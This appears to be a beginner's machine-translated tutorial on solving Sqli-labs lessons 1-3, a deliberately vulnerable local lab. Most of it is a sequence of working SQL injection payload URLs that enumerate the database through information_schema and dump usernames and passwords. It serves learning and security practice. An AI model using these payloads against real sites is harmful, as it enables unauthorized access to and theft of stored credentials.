Learning SQL injection through Sqli-labs-the less1-3 of fundamental challenges

first of all, look at some basic knowledge!!!! I am just a beginner, to record their own learning process, there are any mistakes please point out, thank you! Big guy, please bypass!!!!

URL encoding: The General URL encoding is actually the ASCII of that character is worth hexadecimal, and then add a% in front. For specific coding, please see the Encoding table on W3school: http://www.w3school.com.cn/tags/html_ref_urlencode.html

Common are: The space is%20, the single quotation mark is%27, the pound is%23, the double quotation mark is%22

Determine SQL Injection (error-and false-based blinds): single quotes, and 1=1, and 1=2,or 1=1, or 1=2, etc.

determine the time-based blinds : On top of that, add a sleep function, such as sleep (8) (the function differs from database) The basic steps of SQL injection (this is basically the same as the Sqlmap steps)

three common annotation characters : # 、--+ (space behind),/**/sequence

SQL injection Basic Injection steps
Judging what type of injection
Get information about database users, versions, currently connected databases, and more
Guess the database, table information
Guess the column, field information
Finally, I guess the data can be solved!!

First, add in the source code:

echo "Your SQL statement is". $sql. " <br> ";

To output your SQL statements, it is easier and more intuitive to understand this process.

Note: There may be many kinds of injection methods below, just one example. I mostly record less 3, and less 1 is similar to the Less2 method.

Less 3Get-error Based-single Quotes with twist string (Error-based get single quote morph character injection)

First, set the d=1 to test, normal access, the data can be displayed successfully:

Http://127.0.0.1/sqllibs/Less-3/?id=1

You can see that its query statement is: SELECT * from Users WHERE id= (' 1 ')

Then add ' to judge, and the result shows a syntax error:

Http://127.0.0.1/sqllibs/Less-3/?id=1 '

Because the query statement became: SELECT * from Users WHERE id= (' 1 '), there was a clear error. So, to close ')-+, the execution results are as follows:

Http://127.0.0.1/sqllibs/Less-3/?id=1 ')-+

Can be performed normally, now to guess the length of the field, by the order by N (n is the word segment degree)

Http://127.0.0.1/sqllibs/Less-3/?id=1 ') Order by 3-+

When order by 3 is, normal returns, indicating the field length n>=3, then guess 4:

Http://127.0.0.1/sqllibs/Less-3/?id=1 ') Order by 4-+

Returns an error that indicates the field length is 3. Make the id=-1 on the left side, the Union SELECT statement Stitching query, then:

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,3--+

The return result is, 2, 3, and the following will begin to really query the database of all kinds of information. You can see that only the results of columns 2nd and 3rd appear on the page, so you can only use the 2,3 position. However, two locations should not be enough, it is necessary to use the database connection function, commonly used is concat and Concat_ws, where the first parameter of CONCAT_WS is the delimiter of the connection string.

User (): Returns the users who are using the current database connection

Database (): Returns the databases used by the current database connection

Version (): Returns the versions of the current database

: The decimal ASCII is 58, the decimal ASCII of the space is 32, which is mainly separated by:.

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union Select 1,2,CONCAT_WS (char (32,58,32), User (), database (), version ())-+

You can see the user name:[email protected], the database is: security, database version number is: 5.5.53

Next, query which tables are in the security database. First, the MySQL database information_schema. It is the system database, the record is the database of the current database, tables, columns, user rights and other information, the following is a few commonly used tables.
Schemata: Stores basic information about all MySQL databases, including database name, encoding type path, and so on.
TABLES: Stores the table information in MySQL, including whether the table is a basic table or a system table, what the database engine is, how many rows the table has, the creation time, the last update time, and so on.
COLUMNS: Stores column information for tables in MySQL, including all columns of the table and information about each column, which is the column in the table, the data type of the column, the type of the column, the permissions of the column, the column's comments, and so on.
By directly in the MySQL console experiment can see, query information_schema information, use where statement value can not be directly in English, to enclose with single quotation marks, of course, in hexadecimal notation is also possible.

Security code after: 0x7365637572697479

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,table_name from Information_schema.tables where Table_ schema=0x7365637572697479--+

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,table_name from Information_schema.tables where Table_ schema=0x7365637572697479 Limit 2,1--+

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,table_name from Information_schema.tables where Table_ schema=0x7365637572697479 Limit 3,1--+

Guess how to solve the users table and further guess

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,column_name from Information_schema.columns where Table_ schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1-+

Guess the ID field

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,column_name from Information_schema.columns where Table_ schema=0x7365637572697479 and table_name=0x7573657273 limit 1,1--+

Guess the username field

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union select 1,2,column_name from Information_schema.columns where Table_ schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1-+

Guess the password field

Http://127.0.0.1/sqllibs/Less-3/?id=-1 ') union Select 1,2,CONCAT_WS (char (32,58,32), Id,username,password) from users Limit 2,1-+

Successfully query out data Id:3,username:dummy,password:[email protected]

Learning SQL injection through Sqli-labs-the less1-3 of fundamental challenges